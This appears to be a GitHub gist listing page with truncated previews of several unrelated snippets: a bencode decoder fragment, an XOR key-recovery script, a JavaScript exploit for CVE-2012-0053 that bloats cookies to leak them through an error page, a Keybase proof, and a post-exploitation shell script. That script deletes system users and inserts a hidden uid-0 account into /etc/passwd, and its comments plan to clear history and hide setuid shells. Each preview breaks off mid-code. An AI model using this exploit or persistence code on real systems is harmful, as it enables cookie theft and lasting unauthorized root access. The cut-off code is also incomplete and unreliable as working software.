def decode_string(x, f):
    colon = x.index(':', f)
    try:
        n = int(x[f:colon])
    except (OverflowError, ValueError):
        n = long(x[f:colon])
    if x[f] == '0' and colon != f+1:
        raise ValueError
    colon += 1
@sbehrens
sbehrens / stream_cipher.py
Last active December 10, 2015 20:18
Break stream cipher
import array
import base64
import copy
# Found X0R cipher on an app assessment? Got the ciphertext and know the plaintext? Use this to get the key.
cipher_text = array.array('B', base64.b64decode("Some Blob of base64 encoded ciphertext remove decoder if not base64"))
plain_text = array.array('B', "some known plaintext value")
@sbehrens
sbehrens / CVE-2012-0053.js
Created June 18, 2012 16:36 — forked from btoews/CVE-2012-0053.js
CVE-2012-0053 Exploit
(function(d){
    desired_length = 8192;
    for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){};
    for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){};
    for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){};
    d.cookie = cookie_val;
    d.cookie = "888=8";
    x = new XMLHttpRequest();
    x.onreadystatechange = function(){
        if (x.readyState == 4 && x.status == 400){

Keybase proof

I hereby claim:

  • I am sbehrens on github.
  • I am arbit (https://keybase.io/arbit) on keybase.
  • I have a public key whose fingerprint is 3BCB 4364 EF4A 3F6A C890 A755 18B8 EFD6 D8EE 14EA

To claim this, I am signing this object:

# TODO
# copy binarys to new location, execute from said location. ensure ps command filters out commands
#PORT="1337"
# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use
deluser news > /dev/null 2>&1
deluser list > /dev/null 2>&1
sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt